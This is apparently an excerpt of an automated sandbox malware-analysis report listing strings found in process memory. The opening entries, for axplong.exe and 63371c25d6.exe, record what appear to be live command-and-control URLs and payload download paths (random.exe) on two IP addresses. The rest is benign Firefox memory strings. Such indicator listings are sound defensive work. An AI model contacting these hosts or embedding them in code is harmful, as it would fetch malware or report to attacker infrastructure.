Source: axplong.exe, 00000006.00000003.3263828308.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.00000000014F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php-
Source: axplong.exe, 00000006.00000002.3288889656.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php.M
Source: axplong.exe, 00000006.00000003.3263828308.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.00000000014F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1001
Source: axplong.exe, 00000006.00000002.3288889656.00000000014F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php2001
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php9
Source: axplong.exe, 00000006.00000002.3288889656.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpDMr
Source: axplong.exe, 00000006.00000003.3263828308.0000000001530000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpMM
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpQ
Source: axplong.exe, 00000006.00000003.3263828308.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.00000000014F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpR
Source: axplong.exe, 00000006.00000003.3263828308.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.00000000014F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
Source: axplong.exe, 00000006.00000002.3288889656.00000000014DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpa
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
Source: axplong.exe, 00000006.00000003.3263828308.0000000001530000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000006.00000002.3288889656.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdediMi
Source: axplong.exe, 00000006.00000003.3263828308.0000000001530000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000003.3263828308.0000000001530000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedJM
Source: axplong.exe, 00000006.00000002.3288889656.00000000014F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000006.00000003.3263828308.0000000001530000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpvM
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/f49fa1f45a5fea9f5c7cf18216e50adc2dd0baafe42fb3effbbd4e64e3aa636b77#1
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/lfons
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/ows
Source: axplong.exe, 00000006.00000002.3288889656.00000000014DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: axplong.exe, 00000006.00000003.3263828308.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.00000000014DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe5c7cf182
Source: axplong.exe, 00000006.00000003.3263828308.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.00000000014DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exec7odedY
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: 63371c25d6.exe, 00000007.00000002.2739218915.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000018.00000002.2831755373.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000018.00000002.2831755373.000000000119B000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 63371c25d6.exe, 00000007.00000002.2739218915.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000007.00000002.2739218915.0000000001207000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000018.00000002.2831755373.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000018.00000002.2831755373.000000000119B000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000F45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 63371c25d6.exe, 00000007.00000002.2739218915.0000000001207000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/E
Source: 63371c25d6.exe, 00000007.00000002.2739218915.0000000001207000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/L
Source: 63371c25d6.exe, 00000007.00000002.2739218915.0000000001207000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/S
Source: 63371c25d6.exe, 00000007.00000002.2739218915.0000000001207000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000007.00000002.2739218915.0000000001222000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000007.00000002.2739218915.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000018.00000002.2831755373.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000018.00000002.2831755373.000000000119B000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 0000001D.00000002.3013597839.0000000000F45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 63371c25d6.exe, 00000007.00000002.2739218915.0000000001207000.00000004.00000020.00020000.00000000.sdmp, 63371c25d6.exe, 00000018.00000002.2831755373.00000000011ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 63371c25d6.exe, 00000007.00000002.2739218915.0000000001207000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpN
Source: firefox.exe, 00000015.00000002.2944981005.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2815909694.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000015.00000002.2944981005.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2815909694.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000015.00000002.2944981005.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2815909694.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000015.00000002.2944981005.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2815909694.0000025940698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000015.00000002.2889978017.00000259358BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3075845573.000001EF2D713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000015.00000002.2915888122.000002593A28B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3113810141.000001EF3109E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000015.00000002.2905873141.00000259389E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2931474157.000002593B747000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2906919520.0000025938E83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3069720711.000001EF2CBA9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000015.00000002.2892227537.00000259360B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000015.00000002.2921089355.000002593A997000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2906919520.0000025938E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2931474157.000002593B747000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2931474157.000002593B76D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C858000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3096265421.000001EF2F781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000015.00000002.2940088335.00000259403B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000015.00000003.2820604619.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2924708904.000002593ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000015.00000002.2920348338.000002593A89F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com0
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000015.00000002.2919125459.000002593A62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915569464.000002593A103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919125459.000002593A603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E98B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3085049318.000001EF2E903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000015.00000002.2908644373.0000025939040000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000015.00000002.2880770582.0000025933926000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000015.00000002.2880770582.0000025933961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000015.00000002.2880770582.0000025933926000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000015.00000002.2880770582.0000025933961000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressionsp
Source: firefox.exe, 00000015.00000002.2880770582.0000025933926000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000015.00000002.2879062103.0000025928303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/stringsp
Source: firefox.exe, 00000015.00000002.2944981005.0000025940656000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000015.00000002.2944981005.0000025940656000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000015.00000002.2944981005.0000025940656000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000015.00000002.2963642951.00003172D3A00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.o
Source: firefox.exe, 00000015.00000002.2944981005.0000025940656000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2964435246.00003F69D5E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2910443758.0000025939483000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2917321112.000002593A41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963642951.00003172D3A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963524052.00002F41F0E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963405313.00002CE3A7F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/boolean
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0Branch
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2resource://gre/modules/Region.sys.mjs
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabled
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds/itemshttp://mozilla.org/#/properties/outcomes
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRR
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSizesecurity.certerrors.mitm.auto_enable_enterprise_roo
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3Enabled
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3Enabledhttp://mozilla.org/#/properties/h3GreaseEnabledchrome://glo
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3GreaseEnabled
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/insecureFallback
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictor
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnecthttp://mozilla.org/#/properties/networkPredictor
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedDurationresource://gre/modules/TaskScheduler.sys.mjs
Source: firefox.exe, 00000015.00000002.2917321112.000002593A471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000015.00000002.2917321112.000002593A475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showImportAll
Source: firefox.exe, 00000015.00000002.2917321112.000002593A481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showImportAllresource://gre/modules/Sqlite.sys.mjs
